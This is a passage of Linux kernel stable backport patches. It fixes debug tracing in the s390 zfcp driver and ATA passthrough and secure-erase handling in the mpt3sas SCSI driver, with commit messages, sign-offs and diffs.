zfcp_fc_wka_port *wka_port, + u64 req_id) +{ + struct zfcp_dbf *dbf = wka_port->adapter->dbf; + struct zfcp_dbf_rec *rec = &dbf->rec_buf; + unsigned long flags; + + spin_lock_irqsave(&dbf->rec_lock, flags); + memset(rec, 0, sizeof(*rec)); + + rec->id = ZFCP_DBF_REC_RUN; + memcpy(rec->tag, tag, ZFCP_DBF_TAG_LEN); + rec->port_status = wka_port->status; + rec->d_id = wka_port->d_id; + rec->lun = ZFCP_DBF_INVALID_LUN; + + rec->u.run.fsf_req_id = req_id; + rec->u.run.rec_status = ~0; + rec->u.run.rec_step = ~0; + rec->u.run.rec_action = ~0; + rec->u.run.rec_count = ~0; + + debug_event(dbf->rec, 1, rec, sizeof(*rec)); + spin_unlock_irqrestore(&dbf->rec_lock, flags); +} + static inline void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len, u64 req_id, u32 d_id) diff --git a/drivers/s390/scsi/zfcp_ext.h b/drivers/s390/scsi/zfcp_ext.h index 1282165d778..01527c31d1d 100644 --- a/drivers/s390/scsi/zfcp_ext.h +++ b/drivers/s390/scsi/zfcp_ext.h @@ -49,6 +49,7 @@ extern void zfcp_dbf_adapter_unregister(struct zfcp_adapter *); extern void zfcp_dbf_rec_trig(char *, struct zfcp_adapter *, struct zfcp_port *, struct scsi_device *, u8, u8); extern void zfcp_dbf_rec_run(char *, struct zfcp_erp_action *); +extern void zfcp_dbf_rec_run_wka(char *, struct zfcp_fc_wka_port *, u64); extern void zfcp_dbf_hba_fsf_uss(char *, struct zfcp_fsf_req *); extern void zfcp_dbf_hba_fsf_res(char *, int, struct zfcp_fsf_req *); extern void zfcp_dbf_hba_bit_err(char *, struct zfcp_fsf_req *); diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c index 8e0979c11c8..8898139d055 100644 --- a/drivers/s390/scsi/zfcp_fsf.c +++ b/drivers/s390/scsi/zfcp_fsf.c @@ -1605,7 +1605,7 @@ out: int zfcp_fsf_open_wka_port(struct zfcp_fc_wka_port *wka_port) { struct zfcp_qdio *qdio = wka_port->adapter->qdio; - struct zfcp_fsf_req *req; + struct zfcp_fsf_req *req = NULL; int retval = -EIO; spin_lock_irq(&qdio->req_q_lock); @@ -1634,6 +1634,8 @@ int zfcp_fsf_open_wka_port(struct zfcp_fc_wka_port *wka_port) zfcp_fsf_req_free(req); out: spin_unlock_irq(&qdio->req_q_lock); + if (req && !IS_ERR(req)) + zfcp_dbf_rec_run_wka("fsowp_1", wka_port, req->req_id); return retval; } @@ -1658,7 +1660,7 @@ static void zfcp_fsf_close_wka_port_handler(struct zfcp_fsf_req *req) int zfcp_fsf_close_wka_port(struct zfcp_fc_wka_port *wka_port) { struct zfcp_qdio *qdio = wka_port->adapter->qdio; - struct zfcp_fsf_req *req; + struct zfcp_fsf_req *req = NULL; int retval = -EIO; spin_lock_irq(&qdio->req_q_lock); @@ -1687,6 +1689,8 @@ int zfcp_fsf_close_wka_port(struct zfcp_fc_wka_port *wka_port) zfcp_fsf_req_free(req); out: spin_unlock_irq(&qdio->req_q_lock); + if (req && !IS_ERR(req)) + zfcp_dbf_rec_run_wka("fscwp_1", wka_port, req->req_id); return retval; } From 8467dd468cd5b422e6f26567984b3241bfe3b07e Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:50 +0200 Subject: [PATCH 137/315] zfcp: restore tracing of handle for port and LUN with HBA records commit 7c964ffe586bc0c3d9febe9bf97a2e4b2866e5b7 upstream. This information was lost with commit a54ca0f62f953898b05549391ac2a8a4dad6482b ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.") but is required to debug e.g. invalid handle situations. Signed-off-by: Steffen Maier Fixes: a54ca0f62f95 ("[SCSI] zfcp: Redesign of the debug tracing for HBA records.") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 2 ++ drivers/s390/scsi/zfcp_dbf.h | 2 ++ 2 files changed, 4 insertions(+) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index e99b3d68604..1abe57d2eaf 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -78,6 +78,8 @@ void zfcp_dbf_hba_fsf_res(char *tag, int level, struct zfcp_fsf_req *req) rec->u.res.req_issued = req->issued; rec->u.res.prot_status = q_pref->prot_status; rec->u.res.fsf_status = q_head->fsf_status; + rec->u.res.port_handle = q_head->port_handle; + rec->u.res.lun_handle = q_head->lun_handle; memcpy(rec->u.res.prot_status_qual, &q_pref->prot_status_qual, FSF_PROT_STATUS_QUAL_SIZE); diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h index 97f46e6964d..ac7bce8aab5 100644 --- a/drivers/s390/scsi/zfcp_dbf.h +++ b/drivers/s390/scsi/zfcp_dbf.h @@ -131,6 +131,8 @@ struct zfcp_dbf_hba_res { u8 prot_status_qual[FSF_PROT_STATUS_QUAL_SIZE]; u32 fsf_status; u8 fsf_status_qual[FSF_STATUS_QUALIFIER_SIZE]; + u32 port_handle; + u32 lun_handle; } __packed; /** From 46737af60bbf90efbc66b80b3824fbf9b2e20d4e Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:51 +0200 Subject: [PATCH 138/315] zfcp: fix D_ID field with actual value on tracing SAN responses commit 771bf03537ddfa4a4dde62ef9dfbc82e4f77ab20 upstream. With commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.") we lost the N_Port-ID where an ELS response comes from. With commit 7c7dc196814b9e1d5cc254dc579a5fa78ae524f7 ("[SCSI] zfcp: Simplify handling of ct and els requests") we lost the N_Port-ID where a CT response comes from. It's especially useful if the request SAN trace record with D_ID was already lost due to trace buffer wrap. GS uses an open WKA port handle and ELS just a D_ID, and only for ELS we could get D_ID from QTCB bottom via zfcp_fsf_req. To cover both cases, add a new field to zfcp_fsf_ct_els and fill it in on request to use in SAN response trace. Strictly speaking the D_ID on SAN response is the FC frame's S_ID. We don't need a field for the other end which is always us. Signed-off-by: Steffen Maier Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.") Fixes: 7c7dc196814b ("[SCSI] zfcp: Simplify handling of ct and els requests") Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 2 +- drivers/s390/scsi/zfcp_fsf.c | 2 ++ drivers/s390/scsi/zfcp_fsf.h | 4 +++- 3 files changed, 6 insertions(+), 2 deletions(-) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index 1abe57d2eaf..a940602b600 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -400,7 +400,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf) length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN); zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length, - fsf->req_id, 0); + fsf->req_id, ct_els->d_id); } /** diff --git a/drivers/s390/scsi/zfcp_fsf.c b/drivers/s390/scsi/zfcp_fsf.c index 8898139d055..f246097b7c6 100644 --- a/drivers/s390/scsi/zfcp_fsf.c +++ b/drivers/s390/scsi/zfcp_fsf.c @@ -1085,6 +1085,7 @@ int zfcp_fsf_send_ct(struct zfcp_fc_wka_port *wka_port, req->handler = zfcp_fsf_send_ct_handler; req->qtcb->header.port_handle = wka_port->handle; + ct->d_id = wka_port->d_id; req->data = ct; zfcp_dbf_san_req("fssct_1", req, wka_port->d_id); @@ -1188,6 +1189,7 @@ int zfcp_fsf_send_els(struct zfcp_adapter *adapter, u32 d_id, hton24(req->qtcb->bottom.support.d_id, d_id); req->handler = zfcp_fsf_send_els_handler; + els->d_id = d_id; req->data = els; zfcp_dbf_san_req("fssels1", req, d_id); diff --git a/drivers/s390/scsi/zfcp_fsf.h b/drivers/s390/scsi/zfcp_fsf.h index 5e795b86931..8cad41ffb6b 100644 --- a/drivers/s390/scsi/zfcp_fsf.h +++ b/drivers/s390/scsi/zfcp_fsf.h @@ -3,7 +3,7 @@ * * Interface to the FSF support functions. * - * Copyright IBM Corp. 2002, 2010 + * Copyright IBM Corp. 2002, 2015 */ #ifndef FSF_H @@ -462,6 +462,7 @@ struct zfcp_blk_drv_data { * @handler_data: data passed to handler function * @port: Optional pointer to port for zfcp internal ELS (only test link ADISC) * @status: used to pass error status to calling function + * @d_id: Destination ID of either open WKA port for CT or of D_ID for ELS */ struct zfcp_fsf_ct_els { struct scatterlist *req; @@ -470,6 +471,7 @@ struct zfcp_fsf_ct_els { void *handler_data; struct zfcp_port *port; int status; + u32 d_id; }; #endif /* FSF_H */ From 569816b4a0411d11c2aac1c876c77e6d4292fd47 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:52 +0200 Subject: [PATCH 139/315] zfcp: fix payload trace length for SAN request&response commit 94db3725f049ead24c96226df4a4fb375b880a77 upstream. commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.") started to add FC_CT_HDR_LEN which made zfcp dump random data out of bounds for RSPN GS responses because u.rspn.rsp is the largest and last field in the union of struct zfcp_fc_req. Other request/response types only happened to stay within bounds due to the padding of the union or due to the trace capping of u.gspn.rsp to ZFCP_DBF_SAN_MAX_PAYLOAD. Timestamp : ... Area : SAN Subarea : 00 Level : 1 Exception : - CPU id : .. Caller : ... Record id : 2 Tag : fsscth2 Request id : 0x... Destination ID : 0x00fffffc Payload short : 01000000 fc020000 80020000 00000000 xxxxxxxx xxxxxxxx xxxxxxxx xxxxxxxx <=== 00000000 00000000 00000000 00000000 Payload length : 32 <=== struct zfcp_fc_req { [0] struct zfcp_fsf_ct_els ct_els; [56] struct scatterlist sg_req; [96] struct scatterlist sg_rsp; union { struct {req; rsp;} adisc; SIZE: 28+28= 56 struct {req; rsp;} gid_pn; SIZE: 24+20= 44 struct {rspsg; req;} gpn_ft; SIZE: 40*4+20=180 struct {req; rsp;} gspn; SIZE: 20+273= 293 struct {req; rsp;} rspn; SIZE: 277+16= 293 [136] } u; } SIZE: 432 Signed-off-by: Steffen Maier Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.") Reviewed-by: Alexey Ishchuk Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index a940602b600..90ffe7ba829 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -382,7 +382,7 @@ void zfcp_dbf_san_req(char *tag, struct zfcp_fsf_req *fsf, u32 d_id) struct zfcp_fsf_ct_els *ct_els = fsf->data; u16 length; - length = (u16)(ct_els->req->length + FC_CT_HDR_LEN); + length = (u16)(ct_els->req->length); zfcp_dbf_san(tag, dbf, sg_virt(ct_els->req), ZFCP_DBF_SAN_REQ, length, fsf->req_id, d_id); } @@ -398,7 +398,7 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf) struct zfcp_fsf_ct_els *ct_els = fsf->data; u16 length; - length = (u16)(ct_els->resp->length + FC_CT_HDR_LEN); + length = (u16)(ct_els->resp->length); zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length, fsf->req_id, ct_els->d_id); } From beb0b6c9a7903cbee112258181a5bc9b5b6a1554 Mon Sep 17 00:00:00 2001 From: Steffen Maier Date: Wed, 10 Aug 2016 18:30:53 +0200 Subject: [PATCH 140/315] zfcp: trace full payload of all SAN records (req,resp,iels) commit aceeffbb59bb91404a0bda32a542d7ebf878433a upstream. This was lost with commit 2c55b750a884b86dea8b4cc5f15e1484cc47a25c ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.") but is necessary for problem determination, e.g. to see the currently active zone set during automatic port scan. For the large GPN_FT response (4 pages), save space by not dumping any empty residual entries. Signed-off-by: Steffen Maier Fixes: 2c55b750a884 ("[SCSI] zfcp: Redesign of the debug tracing for SAN records.") Reviewed-by: Alexey Ishchuk Reviewed-by: Benjamin Block Reviewed-by: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 116 +++++++++++++++++++++++++++++++---- drivers/s390/scsi/zfcp_dbf.h | 1 + 2 files changed, 104 insertions(+), 13 deletions(-) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index 90ffe7ba829..d45071caa03 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -3,7 +3,7 @@ * * Debug traces for zfcp. * - * Copyright IBM Corp. 2002, 2015 + * Copyright IBM Corp. 2002, 2016 */ #define KMSG_COMPONENT "zfcp" @@ -349,12 +349,15 @@ void zfcp_dbf_rec_run_wka(char *tag, struct zfcp_fc_wka_port *wka_port, } static inline -void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len, - u64 req_id, u32 d_id) +void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, + char *paytag, struct scatterlist *sg, u8 id, u16 len, + u64 req_id, u32 d_id, u16 cap_len) { struct zfcp_dbf_san *rec = &dbf->san_buf; u16 rec_len; unsigned long flags; + struct zfcp_dbf_pay *payload = &dbf->pay_buf; + u16 pay_sum = 0; spin_lock_irqsave(&dbf->san_lock, flags); memset(rec, 0, sizeof(*rec)); @@ -362,10 +365,41 @@ void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, void *data, u8 id, u16 len, rec->id = id; rec->fsf_req_id = req_id; rec->d_id = d_id; - rec_len = min(len, (u16)ZFCP_DBF_SAN_MAX_PAYLOAD); - memcpy(rec->payload, data, rec_len); memcpy(rec->tag, tag, ZFCP_DBF_TAG_LEN); + rec->pl_len = len; /* full length even if we cap pay below */ + if (!sg) + goto out; + rec_len = min_t(unsigned int, sg->length, ZFCP_DBF_SAN_MAX_PAYLOAD); + memcpy(rec->payload, sg_virt(sg), rec_len); /* part of 1st sg entry */ + if (len <= rec_len) + goto out; /* skip pay record if full content in rec->payload */ + /* if (len > rec_len): + * dump data up to cap_len ignoring small duplicate in rec->payload + */ + spin_lock_irqsave(&dbf->pay_lock, flags); + memset(payload, 0, sizeof(*payload)); + memcpy(payload->area, paytag, ZFCP_DBF_TAG_LEN); + payload->fsf_req_id = req_id; + payload->counter = 0; + for (; sg && pay_sum < cap_len; sg = sg_next(sg)) { + u16 pay_len, offset = 0; + + while (offset < sg->length && pay_sum < cap_len) { + pay_len = min((u16)ZFCP_DBF_PAY_MAX_REC, + (u16)(sg->length - offset)); + /* cap_len <= pay_sum < cap_len+ZFCP_DBF_PAY_MAX_REC */ + memcpy(payload->data, sg_virt(sg) + offset, pay_len); + debug_event(dbf->pay, 1, payload, + zfcp_dbf_plen(pay_len)); + payload->counter++; + offset += pay_len; + pay_sum += pay_len; + } + } + spin_unlock(&dbf->pay_lock); + +out: debug_event(dbf->san, 1, rec, sizeof(*rec)); spin_unlock_irqrestore(&dbf->san_lock, flags); } @@ -382,9 +416,62 @@ void zfcp_dbf_san_req(char *tag, struct zfcp_fsf_req *fsf, u32 d_id) struct zfcp_fsf_ct_els *ct_els = fsf->data; u16 length; - length = (u16)(ct_els->req->length); - zfcp_dbf_san(tag, dbf, sg_virt(ct_els->req), ZFCP_DBF_SAN_REQ, length, - fsf->req_id, d_id); + length = (u16)zfcp_qdio_real_bytes(ct_els->req); + zfcp_dbf_san(tag, dbf, "san_req", ct_els->req, ZFCP_DBF_SAN_REQ, + length, fsf->req_id, d_id, length); +} + +static u16 zfcp_dbf_san_res_cap_len_if_gpn_ft(char *tag, + struct zfcp_fsf_req *fsf, + u16 len) +{ + struct zfcp_fsf_ct_els *ct_els = fsf->data; + struct fc_ct_hdr *reqh = sg_virt(ct_els->req); + struct fc_ns_gid_ft *reqn = (struct fc_ns_gid_ft *)(reqh + 1); + struct scatterlist *resp_entry = ct_els->resp; + struct fc_gpn_ft_resp *acc; + int max_entries, x, last = 0; + + if (!(memcmp(tag, "fsscth2", 7) == 0 + && ct_els->d_id == FC_FID_DIR_SERV + && reqh->ct_rev == FC_CT_REV + && reqh->ct_in_id[0] == 0 + && reqh->ct_in_id[1] == 0 + && reqh->ct_in_id[2] == 0 + && reqh->ct_fs_type == FC_FST_DIR + && reqh->ct_fs_subtype == FC_NS_SUBTYPE + && reqh->ct_options == 0 + && reqh->_ct_resvd1 == 0 + && reqh->ct_cmd == FC_NS_GPN_FT + /* reqh->ct_mr_size can vary so do not match but read below */ + && reqh->_ct_resvd2 == 0 + && reqh->ct_reason == 0 + && reqh->ct_explan == 0 + && reqh->ct_vendor == 0 + && reqn->fn_resvd == 0 + && reqn->fn_domain_id_scope == 0 + && reqn->fn_area_id_scope == 0 + && reqn->fn_fc4_type == FC_TYPE_FCP)) + return len; /* not GPN_FT response so do not cap */ + + acc = sg_virt(resp_entry); + max_entries = (reqh->ct_mr_size * 4 / sizeof(struct fc_gpn_ft_resp)) + + 1 /* zfcp_fc_scan_ports: bytes correct, entries off-by-one + * to account for header as 1st pseudo "entry" */; + + /* the basic CT_IU preamble is the same size as one entry in the GPN_FT + * response, allowing us to skip special handling for it - just skip it + */ + for (x = 1; x < max_entries && !last; x++) { + if (x % (ZFCP_FC_GPN_FT_ENT_PAGE + 1)) + acc++; + else + acc = sg_virt(++resp_entry); + + last = acc->fp_flags & FC_NS_FID_LAST; + } + len = min(len, (u16)(x * sizeof(struct fc_gpn_ft_resp))); + return len; /* cap after last entry */ } /** @@ -398,9 +485,10 @@ void zfcp_dbf_san_res(char *tag, struct zfcp_fsf_req *fsf) struct zfcp_fsf_ct_els *ct_els = fsf->data; u16 length; - length = (u16)(ct_els->resp->length); - zfcp_dbf_san(tag, dbf, sg_virt(ct_els->resp), ZFCP_DBF_SAN_RES, length, - fsf->req_id, ct_els->d_id); + length = (u16)zfcp_qdio_real_bytes(ct_els->resp); + zfcp_dbf_san(tag, dbf, "san_res", ct_els->resp, ZFCP_DBF_SAN_RES, + length, fsf->req_id, ct_els->d_id, + zfcp_dbf_san_res_cap_len_if_gpn_ft(tag, fsf, length)); } /** @@ -414,11 +502,13 @@ void zfcp_dbf_san_in_els(char *tag, struct zfcp_fsf_req *fsf) struct fsf_status_read_buffer *srb = (struct fsf_status_read_buffer *) fsf->data; u16 length; + struct scatterlist sg; length = (u16)(srb->length - offsetof(struct fsf_status_read_buffer, payload)); - zfcp_dbf_san(tag, dbf, srb->payload.data, ZFCP_DBF_SAN_ELS, length, - fsf->req_id, ntoh24(srb->d_id)); + sg_init_one(&sg, srb->payload.data, length); + zfcp_dbf_san(tag, dbf, "san_els", &sg, ZFCP_DBF_SAN_ELS, length, + fsf->req_id, ntoh24(srb->d_id), length); } /** diff --git a/drivers/s390/scsi/zfcp_dbf.h b/drivers/s390/scsi/zfcp_dbf.h index ac7bce8aab5..440aa619da1 100644 --- a/drivers/s390/scsi/zfcp_dbf.h +++ b/drivers/s390/scsi/zfcp_dbf.h @@ -115,6 +115,7 @@ struct zfcp_dbf_san { u32 d_id; #define ZFCP_DBF_SAN_MAX_PAYLOAD (FC_CT_HDR_LEN + 32) char payload[ZFCP_DBF_SAN_MAX_PAYLOAD]; + u16 pl_len; } __packed; /** From 7ddb258493e5e3bb20a72f6054b8073d6bb2cdee Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Fri, 14 Oct 2016 16:18:39 -0400 Subject: [PATCH 141/315] scsi: zfcp: spin_lock_irqsave() is not nestable commit e7cb08e894a0b876443ef8fdb0706575dc00a5d2 upstream. We accidentally overwrite the original saved value of "flags" so that we can't re-enable IRQs at the end of the function. Presumably this function is mostly called with IRQs disabled or it would be obvious in testing. Fixes: aceeffbb59bb ("zfcp: trace full payload of all SAN records (req,resp,iels)") Signed-off-by: Dan Carpenter Signed-off-by: Steffen Maier Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/s390/scsi/zfcp_dbf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/s390/scsi/zfcp_dbf.c b/drivers/s390/scsi/zfcp_dbf.c index d45071caa03..c846a63ea67 100644 --- a/drivers/s390/scsi/zfcp_dbf.c +++ b/drivers/s390/scsi/zfcp_dbf.c @@ -377,7 +377,7 @@ void zfcp_dbf_san(char *tag, struct zfcp_dbf *dbf, /* if (len > rec_len): * dump data up to cap_len ignoring small duplicate in rec->payload */ - spin_lock_irqsave(&dbf->pay_lock, flags); + spin_lock(&dbf->pay_lock); memset(payload, 0, sizeof(*payload)); memcpy(payload->area, paytag, ZFCP_DBF_TAG_LEN); payload->fsf_req_id = req_id; From 3a0c14e01a0c768725eff3a1e068ab7760339f5e Mon Sep 17 00:00:00 2001 From: Andrey Grodzovsky Date: Thu, 10 Nov 2016 09:35:27 -0500 Subject: [PATCH 142/315] scsi: mpt3sas: Fix secure erase premature termination commit 18f6084a989ba1b38702f9af37a2e4049a924be6 upstream. This is a work around for a bug with LSI Fusion MPT SAS2 when perfoming secure erase. Due to the very long time the operation takes, commands issued during the erase will time out and will trigger execution of the abort hook. Even though the abort hook is called for the specific command which timed out, this leads to entire device halt (scsi_state terminated) and premature termination of the secure erase. Set device state to busy while ATA passthrough commands are in progress. [mkp: hand applied to 4.9/scsi-fixes, tweaked patch description] Signed-off-by: Andrey Grodzovsky Acked-by: Sreekanth Reddy Cc: Cc: Sathya Prakash Cc: Chaitra P B Cc: Suganath Prabu Subramani Cc: Sreekanth Reddy Cc: Hannes Reinecke Signed-off-by: Martin K. Petersen Signed-off-by: Willy Tarreau --- drivers/scsi/mpt3sas/mpt3sas_scsih.c | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c index f8c4b856425..e414b713e65 100644 --- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c +++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c @@ -3515,6 +3515,10 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status) SAM_STAT_CHECK_CONDITION; } +static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd) +{ + return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16); +} /** * _scsih_qcmd_lck - main scsi request entry point @@ -3543,6 +3547,13 @@ _scsih_qcmd_lck(struct scsi_cmnd *scmd, void (*done)(struct scsi_cmnd *)) scsi_print_command(scmd); #endif + /* + * Lock the device for any subsequent command until command is + * done. + */ + if (ata_12_16_cmd(scmd)) + scsi_internal_device_block(scmd->device); + scmd->scsi_done = done; sas_device_priv_data = scmd->device->hostdata; if (!sas_device_priv_data || !sas_device_priv_data->sas_target) { @@ -4046,6 +4057,9 @@ _scsih_io_done(struct MPT3SAS_ADAPTER *ioc, u16 smid, u8 msix_index, u32 reply) if (scmd == NULL) return 1; + if (ata_12_16_cmd(scmd)) + scsi_internal_device_unblock(scmd->device, SDEV_RUNNING); + mpi_request = mpt3sas_base_get_msg_frame(ioc, smid); if (mpi_reply == NULL) { From d99fcf7d29f8fc89d99bee4a4c20ae7c8bf5586c Mon Sep 17 00:00:00 2001 From: Suganath Prabu S Date: Thu, 17 Nov 2016 16:15:58 +0530 Subject: [PATCH 143/315] scsi: mpt3sas: Unblock device after controller reset commit 7ff723ad0f87feba43dda45fdae71206063dd7d4 upstream. While issuing any ATA passthrough command to firmware the driver will block the device. But it will unblock the device only if the I/O completes through the ISR path. If a controller reset occurs before command completion the device will remain in blocked state. Make sure we unblock the device following a controller reset if an ATA passthrough command was queued. [mkp: clarified patch description] Cc: # v4.4+ Fixes: ac6c2a93bd07 ("mpt3sas: Fix for SATA drive in blocked state, after diag reset") Signed-off-by: Suganath Prabu S Signed-off-by: Martin K. Petersen [wt: adjust context] Signed-off-by: Willy Tarreau --- drivers/scsi/mpt3sas/mpt3sas_scsih.c | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c index e414b713e65..89794031efc 100644 --- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c +++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c @@ -3390,6 +3390,11 @@ _scsih_check_volume_delete_events(struct MPT3SAS_ADAPTER *ioc, le16_to_cpu(event_data->VolDevHandle)); } +static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd) +{ + return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16); +} + /** * _scsih_flush_running_cmds - completing outstanding commands. * @ioc: per adapter object @@ -3411,6 +3416,9 @@ _scsih_flush_running_cmds(struct MPT3SAS_ADAPTER *ioc) if (!scmd) continue; count++; + if (ata_12_16_cmd(scmd)) + scsi_internal_device_unblock(scmd->device, + SDEV_RUNNING); mpt3sas_base_free_smid(ioc, smid); scsi_dma_unmap(scmd); if (ioc->pci_error_recovery) @@ -3515,11 +3523,6 @@ _scsih_eedp_error_handling(struct scsi_cmnd *scmd, u16 ioc_status) SAM_STAT_CHECK_CONDITION; } -static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd) -{ - return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16); -} - /** * _scsih_qcmd_lck - main scsi request entry point * @scmd: pointer to scsi command object From dafa91f73fead65f927e3ac395b096c72804baf5 Mon Sep 17 00:00:00 2001 From: James Bottomley Date: Sun, 1 Jan 2017 09:39:24 -0800 Subject: [PATCH 144/315] scsi: mpt3sas: fix hang on ata passthrough commands commit ffb58456589443ca572221fabbdef3db8483a779 upstream. mpt3sas has a firmware failure where it can only handle one pass through ATA command at a time. If another comes in, contrary to the SAT standard, it will hang until the first one completes (causing long commands like secure erase to timeout). The original fix was to block the device when an ATA command came in, but this caused a regression with commit 669f044170d8933c3d66d231b69ea97cb8447338 Author: Bart Van Assche Date: Tue Nov 22 16:17:13 2016 -0800 scsi: srp_transport: Move queuecommand() wait code to SCSI core So fix the original fix of the secure erase timeout by properly returning SAM_STAT_BUSY like the SAT recommends. The original patch also had a concurrency problem since scsih_qcmd is lockless at that point (this is fixed by using atomic bitops to set and test the flag). [mkp: addressed feedback wrt. test_bit and fixed whitespace] Fixes: 18f6084a989ba1b (mpt3sas: Fix secure erase premature termination) Signed-off-by: James Bottomley Acked-by: Sreekanth Reddy Reviewed-by: Christoph Hellwig Reported-by: Ingo Molnar Tested-by: Ingo Molnar Signed-off-by: Martin K. Petersen [wt: adjust context] Signed-off-by: Willy Tarreau --- drivers/scsi/mpt3sas/mpt3sas_base.h | 12 +++++++++ drivers/scsi/mpt3sas/mpt3sas_scsih.c | 40 ++++++++++++++++++---------- 2 files changed, 38 insertions(+), 14 deletions(-) diff --git a/drivers/scsi/mpt3sas/mpt3sas_base.h b/drivers/scsi/mpt3sas/mpt3sas_base.h index 994656cbfac..997e13f6d1a 100644 --- a/drivers/scsi/mpt3sas/mpt3sas_base.h +++ b/drivers/scsi/mpt3sas/mpt3sas_base.h @@ -219,6 +219,7 @@ struct MPT3SAS_TARGET { * @eedp_enable: eedp support enable bit * @eedp_type: 0(type_1), 1(type_2), 2(type_3) * @eedp_block_length: block size + * @ata_command_pending: SATL passthrough outstanding for device */ struct MPT3SAS_DEVICE { struct MPT3SAS_TARGET *sas_target; @@ -227,6 +228,17 @@ struct MPT3SAS_DEVICE { u8 configured_lun; u8 block; u8 tlr_snoop_check; + /* + * Bug workaround for SATL handling: the mpt2/3sas firmware + * doesn't return BUSY or TASK_SET_FULL for subsequent + * commands while a SATL pass through is in operation as the + * spec requires, it simply does nothing with them until the + * pass through completes, causing them possibly to timeout if + * the passthrough is a long executing command (like format or + * secure erase). This variable allows us to do the right + * thing while a SATL command is pending. + */ + unsigned long ata_command_pending; }; #define MPT3_CMD_NOT_USED 0x8000 /* free */ diff --git a/drivers/scsi/mpt3sas/mpt3sas_scsih.c b/drivers/scsi/mpt3sas/mpt3sas_scsih.c index 89794031efc..1d6e115571c 100644 --- a/drivers/scsi/mpt3sas/mpt3sas_scsih.c +++ b/drivers/scsi/mpt3sas/mpt3sas_scsih.c @@ -3390,9 +3390,18 @@ _scsih_check_volume_delete_events(struct MPT3SAS_ADAPTER *ioc, le16_to_cpu(event_data->VolDevHandle)); } -static inline bool ata_12_16_cmd(struct scsi_cmnd *scmd) +static int _scsih_set_satl_pending(struct scsi_cmnd *scmd, bool pending) { - return (scmd->cmnd[0] == ATA_12 || scmd->cmnd[0] == ATA_16); + struct MPT3SAS_DEVICE *priv = scmd->device->hostdata; + + if (scmd->cmnd[0] != ATA_12 && scmd->cmnd[0] != ATA_16) + return 0; + + if (pending) + return test_and_set_bit(0, &priv->ata_command_pending); + + clear_bit(0, &priv->ata_command_pending); + return 0; } /** @@ -3416,9 +3425,7 @@ _scsih_flush_running_cmds(struct MPT3SAS_ADAPTER *ioc) if 